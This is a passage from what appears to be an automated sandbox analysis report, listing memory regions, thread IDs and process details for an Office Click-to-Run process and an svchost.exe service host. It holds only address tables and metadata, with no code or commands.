0x
714
0x
6F8
0x
6E8
0x
6CC
0x
69C
0x
640
0x
630
0x
62C
0x
5F4
0x
568
0x
4C8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000dea8130000 | 0xdea8130000 | 0xdea813ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000dea8140000 | 0xdea8140000 | 0xdea8146fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dea8150000 | 0xdea8150000 | 0xdea8163fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dea8170000 | 0xdea8170000 | 0xdea826ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dea8270000 | 0xdea8270000 | 0xdea8273fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dea8280000 | 0xdea8280000 | 0xdea8282fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dea8290000 | 0xdea8290000 | 0xdea8291fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xdea82a0000 | 0xdea835dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000dea8360000 | 0xdea8360000 | 0xdea8366fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea8370000 | 0xdea8370000 | 0xdea8370fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea8380000 | 0xdea8380000 | 0xdea8380fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea8390000 | 0xdea8390000 | 0xdea8390fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea83a0000 | 0xdea83a0000 | 0xdea849ffff | Private Memory | rw |
|
|
|
- |
| mswsock.dll.mui | 0xdea84a0000 | 0xdea84a2fff | Memory Mapped File | r |
|
|
|
- |
| crypt32.dll.mui | 0xdea84c0000 | 0xdea84c9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000dea84d0000 | 0xdea84d0000 | 0xdea85cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dea86a0000 | 0xdea86a0000 | 0xdea875ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dea8760000 | 0xdea8760000 | 0xdea8760fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dea8770000 | 0xdea8770000 | 0xdea8771fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dea8780000 | 0xdea8780000 | 0xdea8780fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000dea8790000 | 0xdea8790000 | 0xdea8791fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dea87a0000 | 0xdea87a0000 | 0xdea87a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000dea87b0000 | 0xdea87b0000 | 0xdea87bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dea87c0000 | 0xdea87c0000 | 0xdea8947fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dea8950000 | 0xdea8950000 | 0xdea8ad0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dea8ae0000 | 0xdea8ae0000 | 0xdea8bdffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xdea8be0000 | 0xdea8f16fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000dea8f20000 | 0xdea8f20000 | 0xdea901ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea9020000 | 0xdea9020000 | 0xdea921ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea9220000 | 0xdea9220000 | 0xdea931ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea9320000 | 0xdea9320000 | 0xdea941ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea9420000 | 0xdea9420000 | 0xdea951ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea9520000 | 0xdea9520000 | 0xdea961ffff | Private Memory | rw |
|
|
|
- |
| counters.dat | 0xdea9620000 | 0xdea9620fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x000000dea9630000 | 0xdea9630000 | 0xdea972ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea9730000 | 0xdea9730000 | 0xdea982ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea9830000 | 0xdea9830000 | 0xdea992ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea9930000 | 0xdea9930000 | 0xdea9a3bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea9a40000 | 0xdea9a40000 | 0xdea9c50fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dea9c60000 | 0xdea9c60000 | 0xdea9d5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dea9d60000 | 0xdea9d60000 | 0xdea9d60fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dea9d70000 | 0xdea9d70000 | 0xdea9d70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dea9d80000 | 0xdea9d80000 | 0xdea9d80fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dea9d90000 | 0xdea9d90000 | 0xdea9d90fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dea9da0000 | 0xdea9da0000 | 0xdea9e9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dea9ea0000 | 0xdea9ea0000 | 0xdea9ea0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dea9eb0000 | 0xdea9eb0000 | 0xdea9eb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dea9ec0000 | 0xdea9ec0000 | 0xdea9ec0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dea9ed0000 | 0xdea9ed0000 | 0xdea9ed0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dea9ee0000 | 0xdea9ee0000 | 0xdea9ee0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dea9ef0000 | 0xdea9ef0000 | 0xdea9ef0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dea9f00000 | 0xdea9f00000 | 0xdeaa2fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000deaa400000 | 0xdeaa400000 | 0xdeaa4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000deaa600000 | 0xdeaa600000 | 0xdeaa6fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000deaa700000 | 0xdeaa700000 | 0xdeaa7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000deaa800000 | 0xdeaa800000 | 0xdeaa8fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000deaa900000 | 0xdeaa900000 | 0xdeaa9fffff | Private Memory | rw |
|
|
|
- |
| winnlsres.dll | 0xdeaaa00000 | 0xdeaaa04fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0xdeaaa10000 | 0xdeaaa1ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000deaaa20000 | 0xdeaaa20000 | 0xdeaaa20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000deaaa30000 | 0xdeaaa30000 | 0xdeaaa30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000deaaa40000 | 0xdeaaa40000 | 0xdeaab3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000deaac40000 | 0xdeaac40000 | 0xdeaad3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff520000 | 0x7df5ff520000 | 0x7ff5ff51ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6ca962000 | 0x7ff6ca962000 | 0x7ff6ca963fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ca964000 | 0x7ff6ca964000 | 0x7ff6ca965fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ca966000 | 0x7ff6ca966000 | 0x7ff6ca967fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ca968000 | 0x7ff6ca968000 | 0x7ff6ca969fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ca96a000 | 0x7ff6ca96a000 | 0x7ff6ca96bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ca96e000 | 0x7ff6ca96e000 | 0x7ff6ca96ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ca972000 | 0x7ff6ca972000 | 0x7ff6ca973fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ca974000 | 0x7ff6ca974000 | 0x7ff6ca975fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ca976000 | 0x7ff6ca976000 | 0x7ff6ca977fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ca978000 | 0x7ff6ca978000 | 0x7ff6ca979fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ca97a000 | 0x7ff6ca97a000 | 0x7ff6ca97bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ca97c000 | 0x7ff6ca97c000 | 0x7ff6ca97dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ca97e000 | 0x7ff6ca97e000 | 0x7ff6ca97ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6ca980000 | 0x7ff6ca980000 | 0x7ff6caa7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6caa80000 | 0x7ff6caa80000 | 0x7ff6caaa2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6caaa4000 | 0x7ff6caaa4000 | 0x7ff6caaa4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6caaa6000 | 0x7ff6caaa6000 | 0x7ff6caaa7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6caaa8000 | 0x7ff6caaa8000 | 0x7ff6caaa9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6caaac000 | 0x7ff6caaac000 | 0x7ff6caaadfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6caaae000 | 0x7ff6caaae000 | 0x7ff6caaaffff | Private Memory | rw |
|
|
|
- |
| officeclicktorun.exe | 0x7ff6cba50000 | 0x7ff6cc37dfff | Memory Mapped File | rwx |
|
|
|
- |
| mskeyprotect.dll | 0x7ffc42390000 | 0x7ffc423a3fff | Memory Mapped File | rwx |
|
|
|
- |
| ncryptsslp.dll | 0x7ffc42440000 | 0x7ffc4245efff | Memory Mapped File | rwx |
|
|
|
- |
| appvfilesystemmetadata.dll | 0x7ffc499d0000 | 0x7ffc49a1cfff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvsubsystemcontroller.dll | 0x7ffc49a20000 | 0x7ffc49ba5fff | Memory Mapped File | rwx |
|
|
|
- |
| appvintegration.dll | 0x7ffc49e20000 | 0x7ffc4a052fff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvvirtualization.dll | 0x7ffc4a060000 | 0x7ffc4a0f7fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x7ffc4a100000 | 0x7ffc4a17ffff | Memory Mapped File | rwx |
|
|
|
- |
| appvcatalog.dll | 0x7ffc4a180000 | 0x7ffc4a229fff | Memory Mapped File | rwx |
|
|
|
- |
| appvmanifest.dll | 0x7ffc4a230000 | 0x7ffc4a361fff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvstreamingmanager.dll | 0x7ffc4a4a0000 | 0x7ffc4a4d6fff | Memory Mapped File | rwx |
|
|
|
- |
| appvorchestration.dll | 0x7ffc4a5c0000 | 0x7ffc4a6affff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x7ffc4a6b0000 | 0x7ffc4a6c6fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr120.dll | 0x7ffc4a6d0000 | 0x7ffc4a7befff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp120.dll | 0x7ffc4a7c0000 | 0x7ffc4a865fff | Memory Mapped File | rwx |
|
|
|
- |
| appvpolicy.dll | 0x7ffc4a870000 | 0x7ffc4a9b0fff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvapi.dll | 0x7ffc4a9c0000 | 0x7ffc4aa3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msdelta.dll | 0x7ffc4aa60000 | 0x7ffc4aae1fff | Memory Mapped File | rwx |
|
|
|
- |
| streamserver.dll | 0x7ffc4aaf0000 | 0x7ffc4aec1fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ffc4b090000 | 0x7ffc4b09dfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x7ffc4b290000 | 0x7ffc4b536fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x7ffc4b540000 | 0x7ffc4b6d6fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7ffc4b6e0000 | 0x7ffc4b6ebfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffc4b890000 | 0x7ffc4b899fff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x7ffc4b8c0000 | 0x7ffc4b8d4fff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x7ffc4b930000 | 0x7ffc4bc6cfff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7ffc4c220000 | 0x7ffc4c25efff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x7ffc4c270000 | 0x7ffc4c279fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4cbd0000 | 0x7ffc4ce43fff | Memory Mapped File | rwx |
|
|
|
- |
| apiclient.dll | 0x7ffc4cec0000 | 0x7ffc4cefbfff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ffc4d9d0000 | 0x7ffc4daa5fff | Memory Mapped File | rwx |
|
|
|
- |
| rstrtmgr.dll | 0x7ffc4dad0000 | 0x7ffc4db01fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp140.dll | 0x7ffc4db10000 | 0x7ffc4dbb6fff | Memory Mapped File | rwx |
|
|
|
- |
| vcruntime140.dll | 0x7ffc4dbc0000 | 0x7ffc4dbd5fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ffc4ddd0000 | 0x7ffc4e145fff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x7ffc4f660000 | 0x7ffc4f686fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffc4fb00000 | 0x7ffc4fb35fff | Memory Mapped File | rwx |
|
|
|
- |
| ucrtbase.dll | 0x7ffc50400000 | 0x7ffc504f1fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7ffc50980000 | 0x7ffc509e7fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ffc50a50000 | 0x7ffc50a69fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ffc50a70000 | 0x7ffc50a85fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x7ffc50ec0000 | 0x7ffc50ed7fff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x7ffc514b0000 | 0x7ffc514c5fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffc51c30000 | 0x7ffc51c3afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffc51c50000 | 0x7ffc51c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffc52640000 | 0x7ffc52652fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ffc534a0000 | 0x7ffc534c2fff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffc53720000 | 0x7ffc53777fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffc53830000 | 0x7ffc5383bfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7ffc53840000 | 0x7ffc53865fff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x7ffc53980000 | 0x7ffc539f3fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffc53b80000 | 0x7ffc53b9efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ffc53be0000 | 0x7ffc53c87fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffc53dd0000 | 0x7ffc53e2cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntasn1.dll | 0x7ffc53f30000 | 0x7ffc53f65fff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x7ffc53f70000 | 0x7ffc53f95fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x7ffc541f0000 | 0x7ffc541f9fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 29 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #61: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #61 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k appmodel |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x678 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege |
| Thread IDs |
0x
B78
0x
B48
0x
9CC
0x
964
0x
960
0x
6E4
0x
67C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000da80000000 | 0xda80000000 | 0xda8fffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dae5db0000 | 0xdae5db0000 | 0xdae5dbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xdae5dc0000 | 0xdae5dc0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000dae5dd0000 | 0xdae5dd0000 | 0xdae5de3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dae5df0000 | 0xdae5df0000 | 0xdae5e6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dae5e70000 | 0xdae5e70000 | 0xdae5e73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dae5e80000 | 0xdae5e80000 | 0xdae5e80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dae5e90000 | 0xdae5e90000 | 0xdae5e91fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xdae5ea0000 | 0xdae5f5dfff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdae5f60000 | 0xdae5f6ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdae5f70000 | 0xdae5f7ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdae5f80000 | 0xdae5f8ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdae5f90000 | 0xdae5f9ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdae5fa0000 | 0xdae5faffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdae5fb0000 | 0xdae5fbffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdae5fc0000 | 0xdae5fcffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdae5fd0000 | 0xdae5fdffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000dae5fe0000 | 0xdae5fe0000 | 0xdae5fe0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae5ff0000 | 0xdae5ff0000 | 0xdae5ff0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dae6000000 | 0xdae6000000 | 0xdae6000fff | Pagefile Backed Memory | r |
|
|
|
- |
| vedatamodel.edb | 0xdae6010000 | 0xdae601ffff | Memory Mapped File | r |
|
|
|
- |
| staterepository-machine.srd-shm | 0xdae6020000 | 0xdae6027fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x000000dae6030000 | 0xdae6030000 | 0xdae6030fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000dae6040000 | 0xdae6040000 | 0xdae6040fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae6050000 | 0xdae6050000 | 0xdae6050fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae6060000 | 0xdae6060000 | 0xdae6060fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae6070000 | 0xdae6070000 | 0xdae6070fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae6080000 | 0xdae6080000 | 0xdae6080fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae6090000 | 0xdae6090000 | 0xdae6096fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dae60a0000 | 0xdae60a0000 | 0xdae60affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000dae60b0000 | 0xdae60b0000 | 0xdae60bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000dae60c0000 | 0xdae60c0000 | 0xdae60cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000dae60d0000 | 0xdae60d0000 | 0xdae60dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000dae60e0000 | 0xdae60e0000 | 0xdae60e3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae60f0000 | 0xdae60f0000 | 0xdae60f1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae6100000 | 0xdae6100000 | 0xdae61fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dae6200000 | 0xdae6200000 | 0xdae6387fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dae6390000 | 0xdae6390000 | 0xdae6390fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae63a0000 | 0xdae63a0000 | 0xdae63a0fff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xdae63b0000 | 0xdae63bffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000dae63c0000 | 0xdae63c0000 | 0xdae63c6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae63d0000 | 0xdae63d0000 | 0xdae63effff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xdae63f0000 | 0xdae63fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000dae6400000 | 0xdae6400000 | 0xdae64fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dae6500000 | 0xdae6500000 | 0xdae6680fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dae6690000 | 0xdae6690000 | 0xdae674ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dae6750000 | 0xdae6750000 | 0xdae684ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae6850000 | 0xdae6850000 | 0xdae694ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xdae6950000 | 0xdae6c86fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000dae6e90000 | 0xdae6e90000 | 0xdae6f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae6f90000 | 0xdae6f90000 | 0xdae708ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dae7090000 | 0xdae7090000 | 0xdae709ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000dae70a0000 | 0xdae70a0000 | 0xdae70affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000dae70b0000 | 0xdae70b0000 | 0xdae70bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000dae70c0000 | 0xdae70c0000 | 0xdae70cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000dae70d0000 | 0xdae70d0000 | 0xdae80cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dae80d0000 | 0xdae80d0000 | 0xdaf80cffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xdaf80d0000 | 0xdaf80dffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf80e0000 | 0xdaf80effff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8100000 | 0xdaf810ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8140000 | 0xdaf814ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8150000 | 0xdaf815ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8160000 | 0xdaf816ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8170000 | 0xdaf817ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8180000 | 0xdaf818ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8190000 | 0xdaf819ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000daf81a0000 | 0xdaf81a0000 | 0xdaf821ffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xdaf8220000 | 0xdaf822ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000daf8230000 | 0xdaf8230000 | 0xdaf8230fff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xdaf8240000 | 0xdaf824ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8250000 | 0xdaf825ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8260000 | 0xdaf826ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8270000 | 0xdaf827ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8280000 | 0xdaf828ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8290000 | 0xdaf829ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf82a0000 | 0xdaf82affff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf82b0000 | 0xdaf82bffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf82c0000 | 0xdaf82cffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf82d0000 | 0xdaf82dffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf82e0000 | 0xdaf82effff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf82f0000 | 0xdaf82fffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8300000 | 0xdaf830ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8310000 | 0xdaf831ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8320000 | 0xdaf832ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8330000 | 0xdaf833ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8340000 | 0xdaf834ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8350000 | 0xdaf835ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8360000 | 0xdaf836ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8370000 | 0xdaf837ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8380000 | 0xdaf838ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000daf8390000 | 0xdaf8390000 | 0xdaf83b9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xdaf83c0000 | 0xdaf83cffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf83d0000 | 0xdaf83dffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf83e0000 | 0xdaf83effff | Memory Mapped File | r |
|
|
|
